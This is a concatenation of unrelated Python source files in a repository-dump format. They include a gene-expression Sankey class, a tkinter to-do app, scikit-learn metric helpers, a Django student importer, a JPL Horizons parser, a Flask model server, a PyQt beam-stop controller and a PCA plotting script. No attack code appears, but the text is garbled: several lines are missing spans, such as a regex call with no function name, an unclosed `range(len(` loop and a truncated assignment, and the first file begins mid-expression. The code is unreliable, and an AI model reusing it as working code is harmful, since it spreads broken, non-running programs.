+ str(x)), list(set(self._meta_df[res])))) for res in self.sankey_dict['resolutions']] for res in sublist] self.sankey_dict['node_data'] = pd.DataFrame(self.sankey_dict['node_labels'], columns=['node_labels']) self.sankey_dict['node_data']['res'] = [x.split('_')[0] for x in self.sankey_dict['node_data']['node_labels'].tolist()] def _check_args(self, coexpressed_genes, silhouette, modularity): """ Check additional user arguments and add data to sankey_dict Parameters ---------- coexpressed_genes: List[List[str]] (optional) Nested lists of strings of length three that are gene names. The gene names must be present in exp_df. silhouette: DataFrame (Pandas) (optional) Cluster resolution and community assignment by silhouette score modularity: DataFrame (Pandas) (optional) Cluster resolution value by modularity score """ if silhouette is not None: self.sankey_dict['silhouette'] = {data[0]:data[1] for data in silhouette.values} self.sankey_dict['node_data']['silhoutte_score'] = [round(self.sankey_dict['silhouette'][x],2) for x in self.sankey_dict['node_data']['node_labels']] self._create_silhouette_colorbar() if modularity is not None: self.sankey_dict['modularity'] = {data[0]:data[1] for data in modularity.values} self.sankey_dict['node_data']['modularity'] = [round(self.sankey_dict['modularity'][x],2) for x in self.sankey_dict['node_data']['res']] if coexpressed_genes is not None: check_coexp_gene_input = list(set([genes for gene_sublist in coexpressed_genes for genes in gene_sublist]) - set(list(self._exp_df))) if len(check_coexp_gene_input) > 0: print('Exiting Error: The following gene(s) are missing: ', *check_coexp_gene_input, sep = ", ") exit() self.sankey_dict['coexp_genes'] = coexpressed_genes self.sankey_dict['coexp_dict'] = {tuple(coexp_set): [] for coexp_set in coexpressed_genes} self.sankey_dict['coexp_color'] = {tuple(coexp_set): [] for coexp_set in coexpressed_genes} def _color_mapper(self, vmin, vmax, values_to_map, cmap): """ Map a list of values to a hex color codes Parameters ---------- vmin: float minimum value for normalization vmax: float max value for normalization values_to_map: list list of floats for normalization Returns ------- hex_list: list[str] List of strings that are color hex codes mapper: class object Class object from ScalarMappable """ norm = matplotlib.colors.Normalize(vmin=vmin, vmax=vmax, clip=True) mapper = cm.ScalarMappable(norm=norm, cmap=cmap) rgba_list = [mapper.to_rgba(val) for val in values_to_map] hex_list = [mcolors.to_hex(color) for color in rgba_list] return hex_list, mapper def _normalize_silhouette(self): """Normalize silhouette score within each cluster resolution""" node_list = [] for items in self.sankey_dict['resolutions']: node_temp = self.sankey_dict['node_data'][self.sankey_dict['node_data']['res'] == items].copy() node_temp['silhoutte_norm_by_res'] = [abs(float(i)/max(node_temp['silhoutte_score'].tolist())) for i in node_temp['silhoutte_score'].tolist()] node_list.append(node_temp) norm_sil_df = pd.concat(node_list) self.sankey_dict['node_data']['silhoutte_norm_by_res'] = norm_sil_df['silhoutte_norm_by_res'] def _create_silhouette_colorbar(self): """Create Silhouette color bar""" self._normalize_silhouette() silhouette_list = [x/10.0 for x in list(range(-10,11,1))] # define silhouette score range silhouette_hex_list, mapper = self._color_mapper(min(silhouette_list), max(silhouette_list), self.sankey_dict['node_data']['silhoutte_norm_by_res'], 'RdYlBu_r') self.sankey_dict['node_data']['silhoutte_hex'] = silhouette_hex_list # update to modularity self.sankey_dict['silhouette_list'] = silhouette_list self.sankey_dict['silhouette_mapper'] = mapper self.sankey_dict['silhouette_colorbar'] = [mcolors.to_hex(self.sankey_dict['silhouette_mapper'].to_rgba(x)) for x in self.sankey_dict['silhouette_list']] def _count_flow_by_flow(self): """"Count the number of cells flowing from resolution (n) community (i) to resolution (m) community (j)""" self.sankey_dict['sankey_flow_count'] = dict(collections.Counter(tuple(['_'.join([self.sankey_dict['resolutions'][res], str(dag[0])]), '_'.join([self.sankey_dict['resolutions'][res+1], str(dag[1])])]) for res in range(0, len(self.sankey_dict['resolutions'])-1) for dag in self._meta_df[[self.sankey_dict['resolutions'][res], self.sankey_dict['resolutions'][res+1]]].values)) def _wrangle_source_to_target(self): """Create a source to target mapping for each resolution (n) community (i) to resolution (m) community (j)""" self.sankey_dict['data'] = pd.DataFrame([[res[0], res[1], self.sankey_dict['node_labels'].index(res[0]), self.sankey_dict['node_labels'].index(res[1]), cell_count] for res, cell_count in self.sankey_dict['sankey_flow_count'].items()], columns=['source_label', 'target_label', 'source', 'target', 'value']) self.sankey_dict['data']['source_res'] = np.array([x.split('_') for x in self.sankey_dict['data']['source_label']])[:,0].tolist() self.sankey_dict['data']['source_cluster'] = np.array([x.split('_') for x in self.sankey_dict['data']['source_label']])[:,1].tolist() self.sankey_dict['data']['target_res'] = np.array([x.split('_') for x in self.sankey_dict['data']['target_label']])[:,0].tolist() self.sankey_dict['data']['target_cluster'] = np.array([x.split('_') for x in self.sankey_dict['data']['target_label']])[:,1].tolist() def _create_expression_colorbar(self): """Create a gene expression bar""" # Create a hex code color range for a gene's expression in the sankey network streams for gene, expression in self.sankey_dict['exp_dict'].items(): exp_hex_list, mapper = self._color_mapper(min(expression), max(expression), expression, 'Purples') self.sankey_dict['data'][gene+'_hex'] = exp_hex_list self._sort_hex_colorbar(gene, expression, exp_hex_list) def _sort_hex_colorbar(self, gene, expression, hex_list): """ Sort the hex color code by gene expression in ascending order Parameters ---------- gene: str String that is a gene name expression: list List of floats for each cell's gene expression value in the sankey stream hex_list: list List of strings that are hex codes """ gene_color_bar_df = pd.DataFrame(self.sankey_dict['exp_dict'][gene]) gene_color_bar_df['hex'] = hex_list gene_color_bar_df.sort_values(0, inplace=True) self.sankey_dict['exp_colorbar'][gene] = dict(colorscale=gene_color_bar_df['hex'].tolist(), showscale=True, cmin=min(expression), cmax=max(expression)) def _coexpression(self, cell_ids): """ Compute the co-expression of user defined genes for each batch of cell ids Parameters ---------- cell_ids : list List of strings that are cell barcodes """ #TODO: Check code for genes in self.sankey_dict['coexp_genes']: # gene_sums = self._exp_df.loc[cell_ids, genes].sum(axis = 1).tolist() gene_sum = sum(self._exp_df.loc[cell_ids][genes].sum().tolist()) # if sum(gene_sums) > 0: if gene_sum > 0: dec_percentile = [x/gene_sum for x in self._exp_df.loc[cell_ids][genes].sum().tolist()] # dec_percentile = [x/sum(gene_sums) for x in gene_sums] self.sankey_dict['coexp_dict'][tuple(genes)].append(dec_percentile) self.sankey_dict['coexp_color'][tuple(genes)].append(matplotlib.colors.to_hex(dec_percentile)) else: pass def _avg_expression(self, cell_ids): """ Compute the average expression of a gene for a subset of cell ids Parameters ---------- cell_ids: list List of strings to be spliced from expression dataframe """ for gene in self.sankey_dict['genes']: self.sankey_dict['exp_dict'][gene].append(self._exp_df.loc[cell_ids][gene].mean()) def compute(self): """Compute the average expression of the user defined genes for each flow transition""" for cluster_data in self.sankey_dict['data'][['source_res', 'source_cluster', 'target_res', 'target_cluster']].values: cell_ids = self._meta_df[(self._meta_df[cluster_data[0]]==cluster_data[1]) & (self._meta_df[cluster_data[2]]==cluster_data[3])].index.tolist() self._avg_expression(cell_ids) if self.sankey_dict['coexp_genes'] is not None: self._coexpression(cell_ids) self._create_expression_colorbar()
<gh_stars>10-100 import logging from async_v20.client import OandaClient from async_v20.client import __version__ from async_v20.definitions import * from async_v20.endpoints.annotations import * logging.getLogger(__name__).addHandler(logging.NullHandler()) __version__ = __version__
<filename>ait/core/server/plugins/ from .data_archive import * from .limit_monitor import * from .openmct import *
<filename>To-Do/ #Importing Modules from textwrap import fill import tkinter as tr from tkinter import TOP, Listbox, messagebox import pickle from tkinter.tix import Tk #Title root = tr.Tk() root.title("To-Do List") #Declaration height1 = 30 width1 = 100 width2 = 20 default_font = "Arial Rounded MT" font_size = 12 saver = 2 button_color = "white" #Functions def add_entry(): global saver task_data = entry.get() if task_data == "": #Making sure no blank task tr.messagebox.showwarning(title="Failed",message="Blank entry can not be added") else: if saver %2 == 0: task_data = "❒ "+task_data tasks.insert(tr.END, task_data) entry.delete(0, tr.END) #Clears task after input else: task_data = "❒ "+task_data tasks.insert(tr.END, task_data) entry.delete(0, tr.END) #Clears task after input data = tasks.get(0,tasks.size()) pickle.dump(data, open("To-Do.dat","wb")) def drop_entry(): try: select_entry = tasks.curselection()[0] tasks.delete(select_entry) except: tr.messagebox.showwarning(title="Failed",message="Please select a task to delete") def save_entry(): data = tasks.get(0,tasks.size()) pickle.dump(data, open("To-Do.dat","wb")) tr.messagebox.showwarning(title="Successful",message="Tasks are saved at To-Do.dat") def auto_save(): global saver saver += 1 if saver%2 != 0: tr.messagebox.showwarning(title="Successful",message="Auto Save Enabled") else: tr.messagebox.showwarning(title="Successful",message="Auto Save Disabled") def delete_all(): tasks.delete(0,tr.END) #Design Part framming = tr.Frame(root) framming.pack() scrollbar = tr.Scrollbar(framming) scrollbar.pack(side=tr.RIGHT, fill=tr.Y) tasks = tr.Listbox(framming, height=height1, width=width1, bg="#9cedc3", font=(default_font,font_size), cursor="dot") tasks.pack() tasks.config(yscrollcommand=scrollbar.set) scrollbar.config(command=tasks.yview) entry = tr.Entry(root, width=80, bg="#c3e7fd", font=(default_font,font_size)) entry.pack() #Buttons button1 = tr.Button(root, command= add_entry, text= "[+] Add", width= width2, bg="#03ac13", fg=button_color, font=(default_font,font_size)) button1.pack(side=tr.RIGHT) button2 = tr.Button(root, command= drop_entry, text= "[-] Drop", width= width2, bg="#ffa500", fg=button_color, font=(default_font,font_size)) button2.pack(side=tr.RIGHT) button3 = tr.Button(root, command= save_entry, text= "[✔] Save", width= width2, bg= "#1260cc", fg=button_color, font=(default_font,font_size)) button3.pack(side=tr.RIGHT) button4 = tr.Button(root, command= auto_save, text= "[✔✔] Auto Save", width= width2, bg= "#006242", fg=button_color, font=(default_font,font_size)) button4.pack(side=tr.RIGHT) button5 = tr.Button(root, command= delete_all, text= "[🗑] Delete All", width= width2, bg= "#8b0000", fg=button_color, font=(default_font,font_size)) button5.pack(side=tr.RIGHT) #Runner def runner(): try: #For auto restoring previous state data = pickle.load(open("To-Do.dat", "rb")) tasks.delete(0, tr.END) for x in data: tasks.insert(tr.END, x) except: pass root.mainloop() runner()
<reponame>tomasoptytek/cf_data_mining #!/usr/bin/env python # -*- coding: utf-8 -*- __author__ = 'daleksovski' from sklearn import metrics def build_classifier(classifier, data): '''Builds a classifier :param classifier: a Classifier object :param data: a SciKit dataset structure ''' # generic, for all DataMining libraries # ------------------------------------- classifier.build_classifier(data) def apply_classifier(classifier, data): '''Applies a classifier on a dataset, and gets predictions :param classifier: a classifier :param data: a SciKit dataset :return: the input data containing a key targetPredicted with the classifier predictions ''' # generic, for all DataMining libraries # ------------------------------------- new_data = classifier.apply_classifier(data) return new_data def helper_extract_true_values_and_predictions(data): y_true = data["target"] y_pred = data["targetPredicted"] return (y_true, y_pred) def accuracy_score(data): '''Calculates accuracy of a classification classifier :param data: a SciKit dataset, containing key targetPredicted :return: accuracy, float ''' y_true, y_pred = helper_extract_true_values_and_predictions(data) from sklearn.metrics import accuracy_score result_acc = accuracy_score( y_true, y_pred ) return result_acc def mse(data): '''Calculates mean_squared_error (MSE) of a regression classifier :param data: a SciKit dataset, containing key targetPredicted :return: MSE, float ''' from sklearn.metrics import mean_squared_error y_true, y_pred = helper_extract_true_values_and_predictions(data) result_mse = mean_squared_error(y_true, y_pred) return result_mse def calculate_classification_statistics(dataset): # Old format: # 'Expected true and predicted labels for each fold, but failed.' + # 'If you wish to provide labels for each fold separately it should look like: ' + # '[[y_true_1, y_predicted_1], [y_true_2, y_predicted_2], ...]') labels = [[],[]] for i in range(0,len( labels[0].append(dataset['target'][i]) labels[1].append(dataset['targetPredicted'][i]) # Check if we have true and predicted labels for each fold if labels and type(labels[0][0]) == list: try: # Flatten y_true, y_pred = [], [] for fold_labels in labels: y_true.extend(fold_labels[0]) y_pred.extend(fold_labels[1]) labels = [y_true, y_pred] except: raise Exception('Expected true and predicted labels for each fold, but failed.' + 'If you wish to provide labels for each fold separately it should look like: ' + '[[y_true_1, y_predicted_1], [y_true_2, y_predicted_2], ...]') if len(labels) != 2: raise Exception('Wrong input structure, this widget accepts labels in the form: [y_true, y_pred]') y_true, y_pred = labels classes = set() classes.update(y_true + y_pred) classes = sorted(list(classes)) # Assign integers to classes class_to_int = {} for i, cls_label in enumerate(classes): class_to_int[cls_label] = i y_true = [class_to_int[lbl] for lbl in y_true] y_pred = [class_to_int[lbl] for lbl in y_pred] accuracy = metrics.accuracy_score(y_true, y_pred) precision = metrics.precision_score(y_true, y_pred, average='micro') recall = metrics.recall_score(y_true, y_pred, average='micro') f1 = metrics.f1_score(y_true, y_pred, average='micro') confusion_matrix = metrics.confusion_matrix(y_true, y_pred) if len(classes) == 2: auc = metrics.auc_score(y_true, y_pred) else: auc = 'AUC for multiclass problems requires class probabilities' return accuracy, precision, recall, f1, auc, confusion_matrix
<filename>common/<gh_stars>0 import datetime import re from django.contrib.auth.models import User from common.models import Class, Semester, Subject from io import StringIO from lxml.html import parse class ImportException(Exception): pass class BulkImport: def is_allowed(self, clazz, no_lectures, no_exercises): t, _ = clazz.split('/') if t == 'P': if no_lectures: return False elif t == 'C': if no_exercises: return False else: print(f"Uknown class type: {clazz}") return True def parse_subject(self, doc): h2 = doc.xpath('//h2[@class="nomargin"]') if not h2: raise ImportException("Missing h2 element, have you imported correct file?") subject ='\(([^)]+)', h2[0].text) if not subject: raise ImportException("Subject missing in h2 element") return def parse_semester(self, doc): elems = doc.xpath('//h2[@class="nomargin"]/span[@class="outputText"]') if len(elems) != 2: raise ImportException("two elements .outputText with semester not found in h2") year = elems[0].text.split('/')[0] h = elems[1].text.strip().lower() if h == 'letní': return year, False elif h == 'zimní': return year, True raise ImportException("failed to parse semester") def run(self, content, no_lectures=False, no_exercises=False, class_code=None): doc = parse(StringIO(content)).getroot() abbr = self.parse_subject(doc) try: subject = Subject.objects.get(abbr=abbr) except Subject.DoesNotExist: raise ImportException(f"Subject {abbr} does not exist. Please create it first.") year, is_winter = self.parse_semester(doc) semester = Semester.objects.get(year=year, winter=is_winter) classes = list(map(str.strip, doc.xpath('//tr[@class="rowClass1"]/th/div/span[1]/text()'))) labels = list(doc.xpath('//tr[@class="rowClass1"]/th/div/@title')) default_classes = [] for code in class_code or []: try: default_classes.append(Class.objects.get(semester__year=year, semester__winter=is_winter, code=code, subject__abbr=opts['subject'])) except Class.DoesNotExist: raise ImportException(f"Class with code {code} does not exist.") class_in_db = {} for c, label in zip(classes, labels): if not self.is_allowed(c, no_lectures, no_exercises): continue try: class_in_db[c] = Class.objects.get(code=c, semester=semester, subject=subject) except Class.DoesNotExist: s = label.split(' ') class_in_db[c] = Class() class_in_db[c].code = c day = s[6].upper() mapping = {'ÚT': 'UT', 'ČT': 'CT', 'PÁ': 'PA'} class_in_db[c].day = mapping.get(day, day) class_in_db[c].hour = s[7] class_in_db[c].year = class_in_db[c].winter = >= 9 class_in_db[c].time = s[7] class_in_db[c].subject = subject class_in_db[c].semester = semester first_name, last_name = label.replace(',', '').replace('Ph.D.', '').replace('Bc', '').replace('DiS', '').strip().split(' ')[-2:] if first_name and last_name: teacher = User.objects.filter(first_name=first_name, last_name=last_name) if not teacher: raise ImportException(f"Teacher '{first_name}' '{last_name}' not found") class_in_db[c].teacher = teacher[0] class_in_db[c].save() for row in doc.xpath('//table[@class="dataTable"]//tr')[1:]: def clean_name(s): for remove in ['Ing', 'Bc', 'BA', 'MBA', 'Mgr', 'MgrA', '.', ',']: s = s.replace(remove, '') return ' '.join(s.split()).strip() if not row.xpath('./td[2]/a'): raise ImportException("Student login not found in table. Have you imported correct file?") login = row.xpath('./td[2]/a/text()')[0].strip() email = row.xpath('./td[2]/a/@href')[0].replace('mailto:', '').strip() name = clean_name(row.xpath('./td[3]/a/text()')[0]) lastname, firstname = name.strip().split(' ', 1) member_of = [] created = False user = None try: user = User.objects.get(username=login) except User.DoesNotExist: user = User.objects.create_user(login.upper(), email) user.first_name = firstname user.last_name = lastname created = True for i, el in enumerate(row.xpath('.//input')): clazz = classes[i] if "checked" in el.attrib: if not self.is_allowed(clazz, no_lectures, no_exercises): continue if user not in class_in_db[clazz].students.all(): member_of.append(clazz) class_in_db[clazz].students.add(user) elif clazz in class_in_db: class_in_db[clazz].students.remove(user) for clazz in default_classes: if user not in clazz.students.all(): member_of.append(clazz.code) clazz.students.add(user) classess = [] for c in Class.objects.filter(students__username=login, semester__year=year, semester__winter=is_winter, classess.append(f"{c.timeslot} {c.teacher.username}") yield { 'login': login, 'firstname': firstname, 'lastname': lastname, 'created': created, 'classes': classess, }
<reponame>bluePhlavio/eph """Defines parsing functions to read Jpl Horizons ephemeris.""" import re from string import whitespace as ws from astropy import units as u from astropy.table import Table, QTable from .util import parse_table, parse_row, numberify, transpose, yes_or_no from .exceptions import JplBadReqError, ParserError from .horizons import get_col_dim def get_sections(source): """ Split a Jpl Horizons ephemeris in header, data and footer. Args: source (str): the content of the Jpl Horizons ephemeris data output. Returns: :class:`tuple`: a tuple of strings containing header, data and footer sections respectively. .. note: Note that whitespaces and \* are stripped out from section contents. """ m = re.match(r'(.*?)\$\$SOE(.*?)\$\$EOE(.*?)', source, flags=re.DOTALL) if m: to_strip = ws + '*' return ( for i in range(1, 4)) else: problem_report, jplparams = map(lambda x: x.strip(ws), re.split(r'!\$\$SOF', source)) raise JplBadReqError(problem_report) def get_subsections(source): """ Split a source string in a list of sections separated by one or more \*. Args: source (str): the source string to be splitted. Returns: :class:`list`: the lists of subsections. """ to_strip = ws return list(map(lambda ss: ss.strip(to_strip), re.split(r'\*{3,}', source))) def parse_params(source): m ='(?<=!\$\$SOF)[\s\S]*$', source) if m: to_strip = ws cleaned = return { for m in re.finditer(r'(\S*)\s=\s(\S*)', cleaned) } return dict() def check_csv(source): params = parse_params(source) csv = params.get('CSV_FORMAT', 'NO') to_strip = ws + '\'"' cleaned = csv.strip(to_strip) return yes_or_no(cleaned) def parse_meta(header): meta = { for m in re.finditer(r'(.*?\D):\s(.*)', header) } meta['Target body name'] = re.match( r'^\S*', meta['Target body name']).group(0).lower() meta['Center body name'] = re.match( r'^\S*', meta['Center body name']).group(0).lower() return meta def parse_units(meta): if 'Output units' in meta.keys(): value = meta['Output units'].split(',') space_u, time_u = map(lambda unit: u.Unit(unit), value[0].lower().split('-')) return dict( JD=u.Unit('day'), TIME=time_u, SPACE=space_u, VELOCITY=space_u / time_u, ANGLE=u.Unit('deg'), ANGULAR_VELOCITY=u.Unit('deg') / time_u, ) def parse_data(data, **kwargs): """ Parses the data section of a Jpl Horizons ephemeris in a *list of lists* table. Args: data (str): the section containing data of a Jpl Horizons ephemeris. Returns: :class:`list`: the list of lists representing a data table. """ try: return numberify(parse_table(data, **kwargs)) except: raise ParserError def parse_cols(header): """ Finds and parses ephemeris column names in a Jpl Horizons ephemeris. Args: header (str): the header of a Jpl Horizons ephemeris. Returns: :class:`tuple`: a tuple with the names of columns. """ cols_subsection = get_subsections(header)[-1] cols = parse_row(cols_subsection) return tuple(cols) def parse(source, target=QTable): """ Parses an entire Jpl Horizons ephemeris and build an `astropy`_ table out of it. Args: source (str): the content of the Jpl Horizons data file. target: the type of table to produce (Table or QTable). Returns: table: the table containing data from Jpl Horizons source ephemeris. .. _`astropy`: """ cols_del = ',' if check_csv(source) else r'\s' header, ephemeris, footer = get_sections(source) data = transpose(parse_data(ephemeris, cols_del=cols_del)) cols = parse_cols(header) meta = parse_meta(header) units = parse_units(meta) if target in (Table, QTable): table = target(data, names=cols, meta=meta) else: raise TypeError('Available target classes are Table and QTable.') if units and target is not Table: for col in cols: dim = get_col_dim(col) if dim: table[col].unit = units[dim] return table
<filename>HW1/ # Input: numpy matrix X of features, with n rows (samples), d columns (features) # X[i,j] is the j-th feature of the i-th sample # numpy vector y of labels, with n rows (samples), 1 column # y[i] is the label (+1 or -1) of the i-th sample # Output: numpy vector theta of d rows, 1 column import numpy as np import cvxopt as co def run(X, y): n, d = X.shape H = np.identity(d); f = np.zeros(d); A = np.zeros((n, d)); for i in range(n): for j in range(d): A[i][j] = -y[i]*X[i][j] b = np.full(n, -1) theta = np.array(co.solvers.qp(co.matrix(H,tc='d'), co.matrix(f,tc='d'), co.matrix(A,tc='d'), co.matrix(b,tc='d'))['x']) return theta
<filename>model-1/serve/code/ #!/usr/bin/env python3 import os from flask import Flask from flask import request import pandas as pd from sklearn import linear_model import pickle app = Flask(__name__) @app.route('/ping') def index(): return "true" @app.route('/invocation', methods=['GET']) def get_prediction(): feature1 = float(request.args.get('f1')) feature2 = float(request.args.get('f2')) feature3 = float(request.args.get('f3')) loaded_model = pickle.load(open('model/model.pkl', 'rb')) prediction = loaded_model.predict([[feature1, feature2, feature3]]) return str(prediction) if __name__ == '__main__':,host='')
import networkx as nx import numpy as np import matplotlib.pyplot as plt from networkx.drawing.nx_agraph import graphviz_layout def plot_graph(G, G2=None, nodelist=None, pos=None, figsize=[40, 20], edge_color='b', edge_color2='r', node_size=2500, node_color='y', font_size=12, label=True, width= None): if pos is None: if G2 is not None: g = nx.compose(G, G2) pos = graphviz_layout(g, prog='dot') else: pos = graphviz_layout(G, prog='dot') if nodelist is None: nodelist = list(G.nodes) if width == 'r': width = [np.abs(G[u][v]['weight']) for u, v in G.edges * 2] plt.figure(figsize=figsize) nx.draw_networkx(G, pos=pos, nodelist = nodelist, width = width, edge_color=edge_color, node_size=node_size, node_color=node_color, font_size=font_size) if label is True: nx.draw_networkx_edge_labels(G, pos=pos, edge_labels={i: f"{G.edges[i]['weight']:.2f}" for i in G.edges}, font_size=font_size) if G2 is not None: nx.draw_networkx_edges(G2, pos=pos, nodelist=nodelist, # width=[np.abs(G2[u][v]['weight']) for u, v in G2.edges], node_size=node_size, edge_color=edge_color2) if label is True: nx.draw_networkx_edge_labels(G2, pos=pos, edge_labels={i: f"{G2.edges[i]['weight']:.2f}" for i in G2.edges}, font_size=font_size)
import enum import logging from typing import Optional, Tuple from PyQt5 import QtCore from .component import Component from .motors import Motor, MotorRole, MotorDirection from ...devices.device.frontend import DeviceFrontend logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) class BeamStop(QtCore.QObject, Component): class States(enum.Enum): In = 'in' Out = 'out' Undefined = 'undefined' Moving = 'moving' Error = 'error' stateChanged = QtCore.pyqtSignal(str) movingFinished = QtCore.pyqtSignal(bool) movingProgress = QtCore.pyqtSignal(str, float, float, float) _movetarget: Optional[States] _movephase: Optional[str] state: States = States.Undefined motionstoprequested: bool = False def __init__(self, **kwargs): super().__init__(**kwargs) self._movephase = None self._movetarget = None logger.debug(str(self.__dict__.keys())) self.instrument.motors.newMotor.connect(self.onNewMotorConnected) def onMotorDestroyed(self): # no need to disconnect signal handlers from the destroyed object: Qt does it automatically self.state = self.States.Undefined self.stateChanged.emit(self.state.value) def _disconnectMotor(self, motor: Motor): motor.started.disconnect(self.onMotorStarted) motor.stopped.disconnect(self.onMotorStopped) motor.moving.disconnect(self.onMotorMoving) motor.positionChanged.disconnect(self.onMotorPositionChanged) motor.destroyed.disconnect(self.onMotorDestroyed) motor.cameOnLine.disconnect(self.onMotorOnLine) motor.wentOffLine.disconnect(self.onMotorOffLine) def _connectMotor(self, motor: Motor): motor.started.connect(self.onMotorStarted) motor.stopped.connect(self.onMotorStopped) motor.moving.connect(self.onMotorMoving) motor.positionChanged.connect(self.onMotorPositionChanged) motor.destroyed.connect(self.onMotorDestroyed) motor.cameOnLine.connect(self.onMotorOnLine) motor.wentOffLine.connect(self.onMotorOffLine) def onMotorOnLine(self): self.checkState() def onMotorOffLine(self): self.state = self.States.Undefined self.stateChanged.emit(self.state.value) def onNewMotorConnected(self, motorname: str): if self.instrument.motors[motorname].role == MotorRole.BeamStop: self._connectMotor(self.instrument.motors[motorname]) def moveOut(self): if self._panicking != self.PanicState.NoPanic: raise RuntimeError('Cannot move beam-stop: panic!') self._movetarget = self.States.Out self.motionstoprequested = False self.motorx.moveTo(self.config['beamstop']['out'][0]) def moveIn(self): if self._panicking != self.PanicState.NoPanic: raise RuntimeError('Cannot move beam-stop: panic!') self._movetarget = self.States.In self.motionstoprequested = False self.motorx.moveTo(self.config['beamstop']['in'][0]) def calibrateIn(self, posx: float, posy: float): self.config['beamstop']['in'] = (posx, posy)'Beamstop IN position changed to {posx:.4f}, {posy:.4f}') self.checkState() def calibrateOut(self, posx: float, posy: float): self.config['beamstop']['out'] = (posx, posy)'Beamstop OUT position changed to {posx:.4f}, {posy:.4f}') self.checkState() def checkState(self) -> States: oldstate = self.state if not self.motorsAvailable(): self.state = self.States.Undefined elif self.motorx.isMoving() or self.motory.isMoving(): self.state = self.States.Moving else: xpos = self.motorx.where() ypos = self.motory.where() if (abs(xpos - self.config['beamstop']['in'][0]) <= 0.0001) and \ (abs(ypos - self.config['beamstop']['in'][1]) <= 0.0001): self.state = self.States.In elif (abs(xpos - self.config['beamstop']['out'][0]) <= 0.0001) and \ (abs(ypos - self.config['beamstop']['out'][1]) <= 0.0001): self.state = self.States.Out else: self.state = self.States.Undefined if self.state != oldstate: self.stateChanged.emit(self.state.value) return self.state def onMotorMoving(self, current: float, start: float, end: float): if (self.state == self.States.Moving) and (self._movetarget is not None): self.movingProgress.emit( f'Moving beamstop {self._movetarget.value}, moving motor {self.sender().name}', start, end, current) def onMotorStarted(self, startposition: float): self.checkState() def onMotorStopped(self, success: bool, endposition: float): self.checkState() motor = self.sender() assert isinstance(motor, Motor) if self._movetarget is not None: if self.motionstoprequested: self.movingFinished.emit(False) elif (motor.role == MotorRole.BeamStop) and (motor.direction == MotorDirection.X): # movement of X motor is done, start with Y if success: self.motory.moveTo(self.config['beamstop'][self._movetarget.value][1]) else: # not successful, break moving logger.error('Error while moving beam-stop: target not reached.') self.movingFinished.emit(False) self._movetarget = None elif (motor.role == MotorRole.BeamStop) and (motor.direction == MotorDirection.Y): # moving the Y motor finished self._movetarget = None self.movingFinished.emit(True) if self.stopping and (not self.motorx.isMoving()) and (not self.motory.isMoving()): self.stopComponent() if self._panicking == self.PanicState.Panicking: super().panichandler() def onMotorPositionChanged(self, actualposition: float): try: self.checkState() except DeviceFrontend.DeviceError: # can happen at the very beginning pass def motorsAvailable(self) -> bool: try: return self.instrument.motors.beamstop_x.isOnline() and self.instrument.motors.beamstop_y.isOnline() except KeyError: # happens when either of the motors is not present return False def stopMoving(self): if self._movetarget is not None: self.motory.stop() self.motorx.stop() def disconnectMotors(self): for motorname in [self.xmotorname, self.ymotorname]: if motorname is None: continue try: motor = self.instrument.motors[motorname] except KeyError: pass self._disconnectMotor(motor) def startComponent(self): for motor in self.instrument.motors: if motor.role == MotorRole.BeamStop: self._connectMotor(motor) super().startComponent() def stopComponent(self): try: self._disconnectMotor(self.motorx) except KeyError: pass try: self._disconnectMotor(self.motory) except KeyError: pass super().stopComponent() @property def motorx(self) -> Motor: return self.instrument.motors.beamstop_x @property def motory(self) -> Motor: return self.instrument.motors.beamstop_y def inPosition(self) -> Tuple[float, float]: return self.config['beamstop']['in'] def outPosition(self) -> Tuple[float, float]: return self.config['beamstop']['out'] def panichandler(self): self._panicking = self.PanicState.Panicking if self._movetarget is not None: self.stopMoving() else: super().panichandler()
#!/usr/bin/env python import sys from operator import add import numpy as np from sklearn.decomposition import PCA from sklearn import preprocessing import matplotlib.pyplot as plt import as cm import matplotlib from matplotlib import rcParams rcParams[''] = 'Arial' rcParams['legend.numpoints'] = 1 from optparse import OptionParser parser = OptionParser() parser.add_option("-c", dest="cat_file", help="Categories") parser.add_option("-o", dest="output_file", help="Output file") parser.add_option("-m", "--mirror", action="store_true", dest="mirror_m", default=False) (options, args) = parser.parse_args() if not options.output_file: parser.error('Output file not given') if not options.cat_file: parser.error('Category file not given') M = [] for l in sys.stdin: A = [float(x) for x in l.rstrip().split()] M.append(A) X = np.array(M) X_std = preprocessing.StandardScaler().fit_transform(X) cor_mat = np.corrcoef(X.T) eig_val_cor, eig_vec_cor = np.linalg.eig(cor_mat) eig_pairs_cor = [(np.abs(eig_val_cor[i]), eig_vec_cor[:,i]) for i in range(len(eig_val_cor))] eig_pairs_cor.sort() eig_pairs_cor.reverse() PCA_1 = 0 PCA_2 = 1 print eig_pairs_cor[PCA_1][0] print eig_pairs_cor[PCA_2][0] #exit(1) matrix_w_cor = np.hstack((eig_pairs_cor[PCA_1][1].reshape(len(M),1), eig_pairs_cor[PCA_2][1].reshape(len(M),1))) X_transf = #sklearn_pca = PCA(n_components=4) #X_transf = sklearn_pca.fit_transform(X_std) # #if (options.mirror_m): #X_transf = X_transf * -1 X_transf[:,0] = X_transf[:,0] * -1 #X_transf[:,1] = X_transf[:,1] * -1 #print X_transf[:,1] f = open(options.cat_file) C=[] for l in f: C.append(l.rstrip()) f.close() tmp=set(C) U=[] for t in tmp: U.append(t) colors = cm.rainbow(np.linspace(0, 1, len(U))) #colors = ['cyan', 'lightgreen', 'lightcoral', 'violet', 'grey'] color_map = {} for i in range(len(U)): color_map[U[i]] = colors[i] print color_map matplotlib.rcParams.update({'font.size': 12}) #fig = plt.figure(figsize=(5,5), dpi=300) #fig = matplotlib.pyplot.figure(figsize=(5,5),dpi=300,facecolor='black') fig = matplotlib.pyplot.figure(figsize=(5,5),dpi=300) ax = fig.add_subplot(1,1,1) #ax = fig.add_subplot(1,1,1,axisbg='k') ax.tick_params(labelsize=10) ax.spines['top'].set_visible(False) ax.spines['right'].set_visible(False) #ax.spines['bottom'].set_color('white') #ax.spines['left'].set_color('white') #ax.title.set_color('white') #ax.yaxis.label.set_color('white') #ax.xaxis.label.set_color('white') #ax.tick_params(axis='x', colors='white') #ax.tick_params(axis='y', colors='white') #ax.set_xlabel("Principal component 1") #ax.set_ylabel("Principal component 2") ax.set_xlabel("PC1 (EV = " + str(round(eig_pairs_cor[PCA_1][0],2)) + ")") ax.set_ylabel("PC2 (EV = " + str(round(eig_pairs_cor[PCA_2][0],2)) + ")") ax.get_xaxis().tick_bottom() ax.get_yaxis().tick_left() l = [] for cat in U: print cat # tmp_X = [] # tmp_Y = [] # for idx in [i for i, x in enumerate(C) if x == cat]: # tmp_X.append(X_transf[idx,0]) # 